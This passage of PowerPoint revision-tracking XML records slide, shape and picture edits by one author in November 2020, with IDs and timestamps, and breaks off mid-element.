          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T16:50:42.345" v="5384" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3362586493" sldId="385"/>
            <ac:picMk id="6" creationId="{E35A0C12-CB42-4ADD-9365-AE873797A470}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T16:50:27.898" v="5382" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3362586493" sldId="385"/>
            <ac:picMk id="7" creationId="{A591D30F-BACB-4A99-B3CC-148D58FBDDD2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme modAnim chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-24T07:37:05.108" v="11270" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1334360895" sldId="386"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-24T07:37:05.108" v="11270" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1334360895" sldId="386"/>
            <ac:spMk id="2" creationId="{3CD0DB78-AB5E-4845-BDA8-57563707A40A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:10:37.111" v="9133" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1334360895" sldId="386"/>
            <ac:spMk id="3" creationId="{B8CE49D1-00A0-443D-BE62-56F93D3B93CF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:17:59.622" v="7856" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="703676086" sldId="387"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-14T22:08:12.240" v="5875" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="703676086" sldId="387"/>
            <ac:spMk id="3" creationId="{B6ACF78B-DE49-4DF3-89B3-1E4DDBE37CF7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod delAnim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1023509386" sldId="426"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:48:40.855" v="5891" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:spMk id="2" creationId="{76FD6F19-51EC-4B7D-8EF6-594A8AA731EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:54:35.075" v="10116"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:spMk id="518" creationId="{977DAE93-9189-4111-817E-CB83B361DF7F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:48:44.606" v="5892" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:spMk id="740" creationId="{561EC690-BEDA-4738-BD12-E80FA70B4028}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-23T15:31:29.501" v="11263" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="737257765" sldId="428"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-19T18:29:01.417" v="7918" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="737257765" sldId="42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2T21:17:04.853" v="10238" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2867637286" sldId="429"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T21:17:04.853" v="10238" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2867637286" sldId="429"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp 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657153685" sldId="430"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:08:45.821" v="6226" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="657153685" sldId="430"/>
            <ac:graphicFrameMk id="2" creationId="{4C735EA8-4C70-48F2-85E9-C6AC783C6630}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-19T18:29:33.627" v="7937" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="657153685" sldId="430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1371440257" sldId="430"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:16:43.880" v="10714"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3767213243" sldId="431"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:37:35.429" v="6879" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3767213243" sldId="431"/>
            <ac:spMk id="3" creationId="{EC324661-8184-49C1-967B-3F931AEA285E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:33:42.494" v="6795" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3767213243" sldId="431"/>
            <ac:picMk id="4" creationId="{FC9C35D2-9660-453C-9CF0-5260888DFE97}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:33:45.752" v="6796" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3767213243" sldId="431"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:37:44.839" v="6880" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3869908966" sldId="432"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:29:30.851" v="6714" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3869908966" sldId="432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29:42" v="6715" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3869908966" sldId="432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29:42.867" v="6716" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3869908966" sldId="432"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:09:08.314" v="10713" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="827526027" sldId="433"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:09:08.314" v="10713" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="827526027" sldId="433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31:09.547" v="6725" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="827526027" sldId="433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1:10.304" v="6726" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="827526027" sldId="433"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:35:37.444" v="6808" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1185923952" sldId="434"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:34:34.350" v="6804" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1185923952" sldId="434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34:30.942" v="6802" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1185923952" sldId="434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4:31.731" v="6803" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1185923952" sldId="434"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:35:37.444" v="6808" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1185923952" sldId="434"/>
            <ac:picMk id="7" creationId="{657C5054-3319-4342-960A-5E442E8FFBB3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:17:03.334" v="10716"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3855353301" sldId="435"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:21:18.905" v="8368" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:spMk id="3" creationId="{EC324661-8184-49C1-967B-3F931AEA285E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:41:01.569" v="7030"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:spMk id="8" creationId="{583285F9-C09A-4480-A78E-F88CCE0BD5F6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:38:46.937" v="6885" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435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8:47.878" v="6886" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:picMk id="6" creationId="{4F8D5512-8EF1-495E-ABA5-4B4E0D98186A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:40:47.848" v="7016" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3855353301" sldId="435"/>
            <ac:picMk id="7" creationId="{B9558635-1FC0-4AEE-B36C-C163AB063448}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:17:20.498" v="10719"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4137273230" sldId="436"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:17:14.713" v="10718" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137273230" sldId="436"/>
            <ac:spMk id="3" creationId="{EC324661-8184-49C1-967B-3F931AEA285E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:43:00.343" v="7044" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137273230" sldId="436"/>
            <ac:picMk id="4" creationId="{FC03E69F-0CD0-4974-A335-E7A63ACD1364}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:43:20.071" v="7047" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137273230" sldId="436"/>
            <ac:picMk id="6" creationId="{66153FDF-BFA0-409B-8F6E-B3E74078F8F5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:42:18.505" v="7039" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4137273230" sldId="436"/>
            <ac:picMk id="7" creationId="{B9558635-1FC0-4AEE-B36C-C163AB063448}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:44:54.767" v="9087" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1501548171" sldId="437"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:03:08.562" v="7121" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1501548171" sldId="437"/>
            <ac:spMk id="2" creationId="{96FCEEE1-F38E-4E12-9A3F-10F04935E0CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:03:31.994" v="7201" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1501548171" sldId="437"/>
            <ac:spMk id="3" creationId="{5C4AA90A-EC7D-4FC9-A7DA-22B665AFD91E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:37.621" v="9094" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2648658250" sldId="438"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:14:39.055" v="7827" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438"/>
            <ac:graphicFrameMk id="2" creationId="{4C735EA8-4C70-48F2-85E9-C6AC783C6630}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:37.621" v="9094" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:16:11.921" v="7847" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438"/>
            <ac:picMk id="3" creationId="{01A8D313-C60B-4143-8B57-C5D10D2B4679}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:16:07.597" v="7846" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438"/>
            <ac:picMk id="4" creationId="{D3F49674-7759-4D2E-B296-D829C1E4C6B6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:46:40.816" v="10115" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="515666287" sldId="439"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:18:20.502" v="7876" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="515666287" sldId="439"/>
            <ac:spMk id="2" creationId="{B1541BCC-CC7D-4C5E-B54E-448F9F665217}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:18:15.893" v="7858" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="515666287" sldId="439"/>
            <ac:spMk id="3" creationId="{022B1FC8-5306-45F1-A36E-129F877B4798}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-23T15:31:29.501" v="11263" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="451106316" sldId="440"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:37:12.363" v="7944" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="451106316" sldId="440"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:50:47.250" v="8087" actId="164"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="283222430" sldId="441"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:42:54.753" v="7984" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:spMk id="162" creationId="{56DE9CAD-A77E-4E81-B414-B874F9C12F0F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:49:20.677" v="8082" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:spMk id="163" creationId="{AB2A75D5-E2E1-4848-B9B1-296933BD18BD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:48:15.093" v="8073" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:spMk id="165" creationId="{7C6C7B88-86B7-44C3-954C-2D94B3F17D7E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:43:58.233" v="7997"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="4" creationId="{5D7AEFA4-462D-4196-9C77-60478A86F818}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:28.697" v="8008"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="14" creationId="{0B350746-E3C4-4C01-B43C-50E6ECE8950F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:38.377" v="8019"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="18" creationId="{68C90463-E20A-41C2-8A6B-B026714582BB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22" creationId="{09A69FD5-C9BA-478D-99A3-681992EBA07A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27" creationId="{E7E24BAE-5D20-4098-BCEA-9443374307E0}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
